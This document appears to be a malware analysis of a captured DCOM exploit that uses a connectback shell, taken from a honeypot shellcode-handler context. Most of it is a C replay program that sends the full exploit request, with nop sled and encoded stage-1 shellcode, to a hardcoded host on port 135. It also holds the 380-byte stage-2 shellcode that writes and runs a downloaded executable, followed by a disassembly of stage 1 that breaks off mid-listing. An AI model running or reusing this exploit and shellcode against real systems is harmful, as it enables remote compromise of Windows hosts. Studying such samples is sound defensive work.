ShellcodeHandler Generic LinkTrans

Vulnerability

Description

Reference

this buddy exploits dcom, and uses connectback.
the ip & port to connect back to are known, and we have the decryption for them.

the problem is:
after connecting, we recv() 380 bytes and have to send a 4 byte reply.
if this reply is correct, we get the binary.

the code to open the connectback shell.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/select.h>
#include <ctype.h>
 
#define HOSTNAME "123.23.23.23"
#define PORT 135
 
 
 
 
/*
 * First captured request, replayed verbatim by main().  The leading bytes
 * 05 00 0b 03 are a DCE/RPC v5 header with packet type 0x0b (bind); its
 * frag length field 0x0048 (72) matches the size of this array.
 */
unsigned char unknown_req1[] = {
 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00
 ,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00
 ,0xb8,0x4a,0x9f,0x4d,0x1c,0x7d,0xcf,0x11,0x86,0x1e,0x00,0x20,0xaf,0x6e,0x7c,0x57
 ,0x00,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00
 ,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
 };
 
/*
 * Second captured request, replayed verbatim by main().  Header 05 00 00 03
 * is a DCE/RPC v5 packet of type 0 (request); its frag length 0x068a (1674)
 * matches sizeof unknown_req2.  After the long 0x90 (nop) run it carries
 * the stage 1 shellcode analysed under "Stage 1" below: the bytes
 * eb 15 b9 8b e6 13 41 81 f1 39 e6 13 41 5e on the line that starts
 * ",0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x15" are the
 * jmp short / mov ecx / xor ecx / pop esi decoder shown at 00402018.
 */
unsigned char unknown_req2[] = {0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x8a,0x06,0x00,0x00,0x00,0x00,0x00,0x00
,0x72,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x58,0x7d,0x75,0x75,0x40,0xeb,0xc6,0x47,0xbc,0x71,0x4e,0xa7
,0x1c,0xd0,0xb5,0x97,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09,0x00,0x00,0x03,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x5c,0x00,0x5c,0x00,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x10,0xeb,0x19
,0x9f,0x75,0x18,0x00,0x23,0x37,0xf3,0x77,0xeb,0xe0,0xfd,0x7f,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0xeb,0x04,0xeb,0x04,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x15,0xb9,0x8b,0xe6,0x13,0x41,0x81
,0xf1,0x39,0xe6,0x13,0x41,0x5e,0x80,0x74,0x31,0xff,0x17,0xe2,0xf9,0xeb,0x05,0xe8
,0xe6,0xff,0xff,0xff,0x24,0xcc,0x73,0x9c,0x54,0x27,0x9c,0x57,0x1b,0x9c,0x67,0x0b
,0xba,0x9c,0x6f,0x1f,0xff,0x52,0x17,0x17,0x17,0x44,0x41,0x9c,0x48,0x2b,0x9c,0x4b
,0x2c,0x6f,0x14,0xc8,0x44,0x9c,0x4c,0x37,0x14,0xc8,0x44,0x94,0xd4,0x13,0x9c,0x24
,0x14,0xe0,0x24,0xde,0xbb,0x25,0xdf,0xd6,0xd6,0x12,0x93,0xd7,0x62,0xe1,0x3c,0xdd
,0x62,0xfe,0x4f,0x3c,0xcf,0xc6,0xfc,0x49,0x14,0x49,0x33,0x14,0xc8,0x71,0x9c,0x1c
,0x9c,0x49,0x0b,0x14,0xc8,0x9c,0x13,0x9c,0x14,0xd0,0x49,0x4c,0xe8,0xf7,0x49,0x7f
,0x24,0x25,0x17,0x17,0x7f,0x60,0x64,0x25,0x48,0x43,0xad,0x85,0x79,0x13,0x93,0xe8
,0xc1,0x9c,0xef,0x96,0xfb,0x17,0x15,0x17,0x17,0x9c,0xfb,0x44,0x7d,0x16,0x7d,0x15
,0xad,0x94,0x44,0x94,0x17,0xe8,0xc1,0x44,0x44,0x7f,0x29,0x38,0xce,0xe9,0x7f,0x15
,0x17,0x2b,0x0e,0x9c,0xc3,0x9c,0xcf,0x7d,0x07,0x45,0x44,0xad,0x74,0x27,0x77,0x4d
,0xe8,0xc1,0x47,0xa3,0x15,0x47,0x42,0x44,0xad,0x17,0x4f,0x77,0xf5,0xe8,0xc1,0xa8
,0xbb,0xbb,0x11,0x92,0xe8,0xf2,0x6c,0x79,0x73,0x65,0x7a,0x6c,0x64,0x6c,0x6a,0x64
,0x71,0x66,0x70,0x6c,0x62,0x65,0x7a,0x71,0x79,0x71,0x76,0x76,0x79,0x6a,0x71,0x77
,0x65,0x63,0x7a,0x75,0x6f,0x64,0x62,0x67,0x69,0x69,0x68,0x78,0x65,0x71,0x7a,0x6b
,0x75,0x6f,0x75,0x67,0x76,0x72,0x66,0x67,0x6b,0x75,0x6f,0x6d,0x6c,0x79,0x79,0x67
,0x77,0x78,0x6f,0x6d,0x61,0x6c,0x72,0x6c,0x73,0x70,0x6a,0x63,0x64,0x73,0x6c,0x6c
,0x73,0x69,0x67,0x67,0x6b,0x66,0x73,0x71,0x6c,0x62,0x6a,0x6c,0x71,0x63,0x76,0x73
,0x6e,0x78,0x6f,0x71,0x72,0x78,0x6f,0x76,0x63,0x73,0x75,0x70,0x70,0x6e,0x62,0x61
,0x76,0x72,0x70,0x66,0x63,0x61,0x6a,0x66,0x67,0x76,0x68,0x76,0x71,0x7a,0x63,0x62
,0x7a,0x63,0x66,0x65,0x78,0x6f,0x6e,0x68,0x68,0x61,0x70,0x66,0x6a,0x78,0x67,0x72
,0x6d,0x68,0x70,0x6d,0x75,0x6c,0x75,0x62,0x6d,0x71,0x7a,0x72,0x6d,0x76,0x63,0x76
,0x73,0x70,0x6a,0x79,0x68,0x61,0x62,0x63,0x76,0x76,0x71,0x68,0x78,0x63,0x6b,0x6f
,0x7a,0x6a,0x78,0x68,0x70,0x6f,0x76,0x63,0x66,0x74,0x61,0x74,0x71,0x61,0x66,0x62
,0x74,0x68,0x67,0x75,0x61,0x74,0x72,0x75,0x6a,0x68,0x75,0x63,0x69,0x72,0x62,0x6b
,0x6a,0x67,0x64,0x70,0x6c,0x78,0x67,0x61,0x71,0x66,0x7a,0x67,0x67,0x71,0x63,0x6a
,0x62,0x69,0x79,0x6a,0x71,0x76,0x77,0x66,0x67,0x7a,0x74,0x69,0x72,0x77,0x6f,0x63
,0x79,0x7a,0x8b,0x45,0x30,0x05,0x24,0xfb,0xff,0xff,0xff,0xe0,0xeb,0xf4,0x70,0x75
,0x0b,0x0b,0x1b,0x00,0x6b,0x6a,0x69,0x68,0x74,0x70,0x6f,0x66,0x68,0x6c,0x65,0x65
,0x77,0x72,0x61,0x79,0x78,0x6b,0x61,0x76,0x78,0x77,0x64,0x71,0x61,0x71,0x7a,0x76
,0x77,0x67,0x62,0x77,0x65,0x67,0x6f,0x66,0x74,0x74,0x73,0x6d,0x77,0x6f,0x75,0x6e
,0x62,0x6d,0x6f,0x64,0x73,0x6d,0x78,0x6c,0xeb,0x06,0x6d,0x64,0x59,0x1c,0x00,0x01
,0x8b,0x44,0x24,0xfc,0x05,0xe0,0xfa,0xff,0xff,0xff,0xe0,0x6d,0x75,0x6a,0x64,0x6b
,0x75,0x63,0x69,0x77,0x65,0x63,0x74,0x61,0x75,0x64,0x70,0x73,0x66,0x68,0x67,0x69
,0x62,0x67,0x63,0x75,0x72,0x66,0x6a,0x6a,0x6e,0x6e,0x78,0x72,0x78,0x66,0x5c,0x00

,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x68,0x1c,0x09,0x00,0x01,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46
,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x07,0x00};
 
 
/* Short aliases used by hexdump()'s signature and by the cast of the
 * recv() buffer in getreply(). */
typedef unsigned int uint;
typedef unsigned char byte;
 
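/*
 * Print `len` bytes starting at `data` to stdout as a classic hexdump:
 * a 16-bit offset, sixteen hex pairs (a gap after the eighth), then the
 * same bytes as ASCII with non-printable bytes shown as '.'.
 *
 * data: buffer to dump; read only.  The parameter types are the same as
 *       the file's `byte` / `uint` aliases, so existing callers are fine.
 * len:  number of bytes to show; 0 prints just the two frame lines.
 */
void hexdump(const unsigned char *data, unsigned int len)
{
        static const char conv[] = "0123456789abcdef";

        /* %p with a void pointer: the original cast the pointer to
         * unsigned int for %08x, which truncates on 64-bit targets and
         * is a format/argument mismatch. */
        printf("=------------------[ hexdump(%p , 0x%08x) ]-------------------=\n", (const void *)data, len);

        for (unsigned int row = 0; row < len; row += 0x10) {
                printf("0x%04x  ", row);

                /* hex column; padded with blanks on the final short row */
                for (unsigned int col = 0; col < 0x10; col++) {
                        if (row + col < len) {
                                unsigned char b = data[row + col];
                                printf("%c%c ", conv[b >> 4], conv[b & 0x0F]);
                        } else {
                                printf("   ");
                        }
                        if (col == 7) {
                                printf(" ");
                        }
                }

                printf(" ");

                /* ASCII column, same padding rule */
                for (unsigned int col = 0; col < 0x10; col++) {
                        if (row + col < len) {
                                printf("%c", isprint(data[row + col]) ? data[row + col] : '.');
                        } else {
                                printf(" ");
                        }
                        if (col == 7) {
                                printf(" ");
                        }
                }

                printf("\n");
        }
        printf("=-------------------------------------------------------------------------=\n");
}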
 
 
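/*
 * Wait for data on sockfd, read one recv() worth of it and hexdump it.
 *
 * sockfd:  connected stream socket.
 * timeout: seconds to wait; values <= 0 fall back to the 10 seconds the
 *          original hard-coded (it ignored this parameter entirely).
 *
 * Returns NULL in every case; the reply is only printed.  Exits the
 * process with status 1 when recv() itself fails, as before.
 */
char *getreply(int sockfd, int timeout)
{
        printf("[*] Trying to receive a reply \n");

        /* FD_SET on a descriptor outside [0, FD_SETSIZE) is undefined. */
        if (sockfd < 0 || sockfd >= FD_SETSIZE) {
                printf("\t[-] socket descriptor %i outside select() range\n", sockfd);
                return NULL;
        }

        struct timeval tv = { .tv_sec = timeout > 0 ? timeout : 10, .tv_usec = 0 };
        fd_set readfds;
        FD_ZERO(&readfds);
        FD_SET(sockfd, &readfds);

        /* nfds is the highest descriptor + 1, not FD_SETSIZE.  The original
         * also put stdin into the set, which only made a keypress return
         * early without reading anything; that is dropped. */
        if (select(sockfd + 1, &readfds, NULL, NULL, &tv) < 0) {
                perror("\t[-] select failed");
                return NULL;
        }
        if (!FD_ISSET(sockfd, &readfds)) {
                printf("\t[-] no reply within %i seconds\n", (int)tv.tv_sec);
                return NULL;
        }

        char rb[1500];
        ssize_t got = recv(sockfd, rb, sizeof rb, 0);
        if (got < 0) {
                printf("[-] Connection lost..\n");
                exit(1);
        }
        if (got == 0) {
                /* orderly shutdown by the peer: nothing to dump */
                printf("\t[-] peer closed the connection\n");
                return NULL;
        }

        printf("\t[+] got %i bytes of data \n", (int)got);
        hexdump((unsigned char *)rb, (unsigned int)got);
        return NULL;
}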
 
 
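/*
 * Send `len` bytes from `data` on sockfd with a single send() call.
 *
 * Returns the send() result cast to int: the byte count on success
 * (possibly short), or -1 when send() fails or len is negative.  A short
 * or failed send is reported on stdout/stderr but not retried, so callers
 * that care must compare the result with len.
 */
int senddata(int sockfd, const unsigned char *data, int len)
{
        /* A negative len would turn into a huge size_t for send(). */
        if (len < 0) {
                printf("\t[-] Refusing to send a negative length (%i)\n", len);
                return -1;
        }

        ssize_t sended = send(sockfd, data, (size_t)len, 0);
        if (sended < 0) {
                /* the original printed "(-1 < len)" here and lost errno */
                perror("\t[-] send failed");
        } else if (sended != len) {
                printf("\t[-] Could not send complete data (%i < %i)\n", (int)sended, len);
        } else {
                printf("\t[+] Sended Request \n");
        }
        return (int)sended;
}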
 
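/*
 * Replay the two captured requests (unknown_req1, unknown_req2) against
 * HOSTNAME:PORT and hexdump whatever the peer sends back after each one.
 *
 * Returns 0 once both requests have been sent and the socket is closed,
 * 1 when the socket cannot be created or connect() fails.  The original
 * returned 0 on those failure paths too, which hid them from a calling
 * shell; name-resolution failure still exit()s with 1 as before.
 */
int main(void)
{
        printf("[*]Resolving Hostname %s \n", HOSTNAME);
        /* gethostbyname() is obsolete but is what the file's includes
         * provide; HOSTNAME is a literal dotted-quad here anyway. */
        struct hostent *he = gethostbyname(HOSTNAME);
        if (he == NULL) {
                printf("\t[-] gethostbyname: Couldnt resolve hostname\n");
                exit(1);
        }
        printf("\t[+] Done. (%s) \n", inet_ntoa(*((struct in_addr *)he->h_addr)));

        printf("[*] Connecting Server \n");

        /* zero-initialised so sin_zero is not left indeterminate */
        struct sockaddr_in their_addr = {0};
        their_addr.sin_family = AF_INET;
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        their_addr.sin_port = htons(PORT);

        int sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd == -1) {
                perror("\t[-] Socket failed");
                return 1;
        }
        printf("\t[+] created Socket \n");

        if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
                perror("\t[-] Connect failed");
                close(sockfd);  /* the original leaked the descriptor here */
                return 1;
        }
        printf("\t[+] Connected ...\n");

        /* sizeof yields size_t, so %zu; the original passed it to %i. */
        printf("[*] Sending Request #1 (%zu bytes)\n", sizeof(unknown_req1));
        senddata(sockfd, unknown_req1, (int)sizeof(unknown_req1));
        getreply(sockfd, 0);

        printf("[*] Sending Request #2 (%zu bytes)\n", sizeof(unknown_req2));
        senddata(sockfd, unknown_req2, (int)sizeof(unknown_req2));
        getreply(sockfd, 0);

        printf("[*] Closing Socket \n");
        printf("\t[+] done (%i)\n", close(sockfd));

        return 0;
}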



the 380 byte reply we get after connecting to the host.

/*
 * The 380-byte stage 2 that the connectback peer sends once stage 1 has
 * connected.  Its disassembly is the "Stage 2" listing below: the first
 * bytes 83 ec 20 8b ec are the sub esp,20 / mov ebp,esp at 0040229a.
 */
unsigned char unknown_req3[] = {
0x83 ,0xec ,0x20 ,0x8b ,0xec ,0x89 ,0x5d ,0x04 ,0x89 ,0x7d ,0x00 ,0x81 ,0xec ,0x00 ,0x02 ,0x00
,0x00 ,0x89 ,0x65 ,0x14 ,0x33 ,0xdb ,0x64 ,0x8b ,0x43 ,0x30 ,0x8b ,0x40 ,0x0c ,0x8b ,0x70 ,0x1c
,0xad ,0x8b ,0x78 ,0x08 ,0x89 ,0x7d ,0x08 ,0xe8 ,0x45 ,0x00 ,0x00 ,0x00 ,0x53 ,0x56 ,0x8b ,0x5f
,0x3c ,0x8b ,0x5c ,0x3b ,0x78 ,0x03 ,0xdf ,0x53 ,0x8b ,0x5b ,0x20 ,0x03 ,0xdf ,0x53 ,0x83 ,0xc3
,0x04 ,0x8b ,0x33 ,0x03 ,0xf7 ,0x33 ,0xc9 ,0xac ,0x32 ,0xc8 ,0xc1 ,0xc1 ,0x05 ,0x84 ,0xc0 ,0x75
,0xf6 ,0x2b ,0xca ,0x75 ,0xe9 ,0x58 ,0x2b ,0xd8 ,0xd1 ,0xeb ,0x5e ,0x03 ,0x5e ,0x24 ,0x03 ,0xdf
,0x66 ,0x8b ,0x0b ,0x8b ,0x5e ,0x1c ,0x03 ,0xdf ,0x8b ,0x04 ,0x8b ,0x03 ,0xc7 ,0x5e ,0x5b ,0xff
,0xe0 ,0x5e ,0x68 ,0x33 ,0x32 ,0x00 ,0x00 ,0x68 ,0x77 ,0x73 ,0x32 ,0x5f ,0x54 ,0xba ,0x92 ,0x6e
,0x04 ,0x84 ,0xff ,0xd6 ,0x89 ,0x45 ,0x0c ,0x8b ,0xf8 ,0x53 ,0x6a ,0x04 ,0x55 ,0xff ,0x75 ,0x04
,0xba ,0x00 ,0x90 ,0x66 ,0xe0 ,0xff ,0xd6 ,0x83 ,0xf8 ,0x04 ,0x0f ,0x85 ,0xc5 ,0x00 ,0x00 ,0x00
,0x8b ,0x7d ,0x08 ,0xe8 ,0x0d ,0x00 ,0x00 ,0x00 ,0x69 ,0x6c ,0x6b ,0x68 ,0x63 ,0x76 ,0x64 ,0x2e
,0x65 ,0x78 ,0x65 ,0x00 ,0x00 ,0x8f ,0x45 ,0x18 ,0x53 ,0x6a ,0x02 ,0x6a ,0x01 ,0x53 ,0x53 ,0x68
,0x00 ,0x00 ,0x00 ,0xc0 ,0xff ,0x75 ,0x18 ,0xba ,0x3d ,0xd3 ,0x6b ,0x5c ,0xff ,0xd6 ,0x89 ,0x45
,0x1c ,0x40 ,0x0f ,0x84 ,0x8d ,0x00 ,0x00 ,0x00 ,0x8b ,0x7d ,0x0c ,0x33 ,0xc0 ,0x50 ,0xb4 ,0x02
,0x50 ,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x04 ,0xba ,0x00 ,0x58 ,0x60 ,0xe2 ,0xff ,0xd6 ,0x8b ,0x7d
,0x08 ,0x85 ,0xc0 ,0x74 ,0x1e ,0x8b ,0xc8 ,0x41 ,0x74 ,0x57 ,0x53 ,0x8d ,0x4d ,0x10 ,0x51 ,0x50
,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x1c ,0xba ,0xb9 ,0xbe ,0xf5 ,0xcb ,0xff ,0xd6 ,0x85 ,0xc0 ,0x74
,0x40 ,0xeb ,0xc5 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0x6a ,0x44 ,0x58
,0x2b ,0xe0 ,0x8b ,0xfc ,0x8b ,0xd7 ,0xab ,0x33 ,0xc0 ,0x6a ,0x10 ,0x59 ,0xab ,0xe2 ,0xfd ,0x8b
,0x7d ,0x08 ,0x52 ,0x52 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0xff ,0x75 ,0x18 ,0xba ,0x2c
,0xf1 ,0x94 ,0x26 ,0xff ,0xd6 ,0x58 ,0xfe ,0xc7 ,0x53 ,0x50 ,0xba ,0x01 ,0xd6 ,0x34 ,0xde ,0xff
,0xd6 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0xff ,0x75 ,0x18 ,0xba ,0x3d
,0x53 ,0xcf ,0x27 ,0xff ,0xd6 ,0x8b ,0x7d ,0x0c ,0xff ,0x75 ,0x04 ,0xba ,0x85 ,0x56 ,0x31 ,0x07
,0xff ,0xd6 ,0x8b ,0x7d ,0x08 ,0xba ,0xba ,0x46 ,0x0c ,0xc1 ,0xff ,0xd6
};

Analysis

In short: stage 1 contains a 4-byte authentication key and opens a connectback connection. The attacker then sends stage 2 (380 more bytes of code) over this connection. Stage 2 replies with the authentication key from stage 1; if the key is verified as valid, the attacker streams the binary.

Stage 1

00402018   eb 15            jmp short link-03.0040202f
0040201a   b9 8be61341      mov ecx,4113e68b
0040201f   81f1 39e61341    xor ecx,4113e639
00402025   5e               pop esi
00402026   807431 ff 17     xor byte ptr ds:[ecx+esi-1],17
0040202b  ^e2 f9            loopd short link-03.00402026
0040202d   eb 05            jmp short link-03.00402034
0040202f   e8 e6ffffff      call link-03.0040201a
00402034   33db             xor ebx,ebx
00402036   64:8b43 30       mov eax,dword ptr fs:[ebx+30]
0040203a   8b40 0c          mov eax,dword ptr ds:[eax+c]
0040203d   8b70 1c          mov esi,dword ptr ds:[eax+1c]
00402040   ad               lods dword ptr ds:[esi]
00402041   8b78 08          mov edi,dword ptr ds:[eax+8]
00402044   e8 45000000      call link-03.0040208e
00402049   53               push ebx                                 ; ------ syscall finder
0040204a   56               push esi
0040204b   8b5f 3c          mov ebx,dword ptr ds:[edi+3c]
0040204e   8b5c3b 78        mov ebx,dword ptr ds:[ebx+edi+78]
00402052   03df             add ebx,edi
00402054   53               push ebx
00402055   8b5b 20          mov ebx,dword ptr ds:[ebx+20]
00402058   03df             add ebx,edi
0040205a   53               push ebx
0040205b   83c3 04          add ebx,4
0040205e   8b33             mov esi,dword ptr ds:[ebx]
00402060   03f7             add esi,edi
00402062   33c9             xor ecx,ecx
00402064   ac               lods byte ptr ds:[esi]
00402065   32c8             xor cl,al
00402067   c1c1 05          rol ecx,5
0040206a   84c0             test al,al
0040206c  ^75 f6            jnz short link-03.00402064
0040206e   2bca             sub ecx,edx
00402070  ^75 e9            jnz short link-03.0040205b
00402072   58               pop eax
00402073   2bd8             sub ebx,eax
00402075   d1eb             shr ebx,1
00402077   5e               pop esi
00402078   035e 24          add ebx,dword ptr ds:[esi+24]
0040207b   03df             add ebx,edi
0040207d   66:8b0b          mov cx,word ptr ds:[ebx]
00402080   8b5e 1c          mov ebx,dword ptr ds:[esi+1c]
00402083   03df             add ebx,edi
00402085   8b048b           mov eax,dword ptr ds:[ebx+ecx*4]
00402088   03c7             add eax,edi
0040208a   5e               pop esi
0040208b   5b               pop ebx
0040208c   ffe0             jmp eax
0040208e   5e               pop esi                                  ; ------- end
0040208f   68 33320000      push 3233
00402094   68 7773325f      push 5f327377
00402099   54               push esp
0040209a   ba 926e0484      mov edx,84046e92
0040209f   ffd6             call esi                                 ; loadlibrarya()
004020a1   8bf8             mov edi,eax
004020a3   81ec 00020000    sub esp,200
004020a9   8bec             mov ebp,esp
004020ab   53               push ebx
004020ac   6a 01            push 1
004020ae   6a 02            push 2
004020b0   ba 83538300      mov edx,835383
004020b5   ffd6             call esi                                 ; socket()
004020b7   53               push ebx
004020b8   53               push ebx
004020b9   68 3e2fd9fe      push fed92f3e
004020be   68 02003c19      push 193c0002
004020c3   8bd4             mov edx,esp
004020c5   8bd8             mov ebx,eax
004020c7   6a 10            push 10
004020c9   52               push edx
004020ca   53               push ebx
004020cb   ba 6330605a      mov edx,5a603063
004020d0   ffd6             call esi                                 ; connect()
004020d2   50               push eax
